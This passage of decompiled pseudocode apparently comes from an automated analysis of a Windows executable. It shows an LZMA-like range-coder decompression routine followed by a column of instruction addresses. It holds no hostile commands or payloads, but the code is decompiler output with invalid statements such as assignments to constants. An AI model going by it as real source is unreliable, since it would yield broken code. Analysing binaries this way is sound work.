								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                  0x00000000
                                                  0x00406d5f
                                                  0x00406d5f
                                                  0x00406d64
                                                  0x00406ddb
                                                  0x00406de2
                                                  0x00406dec
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00407441
                                                  0x00407441
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x0040741c
                                                  0x0040741c
                                                  0x00407420
                                                  0x004075cf
                                                  0x00000000
                                                  0x004075cf
                                                  0x0040742c
                                                  0x00407433
                                                  0x0040743b
                                                  0x0040743e
                                                  0x00000000
                                                  0x0040743e
                                                  0x00406d66
                                                  0x00406d66
                                                  0x00406d6a
                                                  0x00406d72
                                                  0x00406d75
                                                  0x00406d77
                                                  0x00406d7a
                                                  0x00406d7c
                                                  0x00406d81
                                                  0x00406d84
                                                  0x00406d8b
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406da0
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406daf
                                                  0x00406dcd
                                                  0x00406dcf
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00000000
                                                  0x00406f97
                                                  0x00406db1
                                                  0x00406db1
                                                  0x00406db4
                                                  0x00406dba
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbf
                                                  0x00406dc2
                                                  0x00406dc4
                                                  0x00406dc5
                                                  0x00406dc8
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e23
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
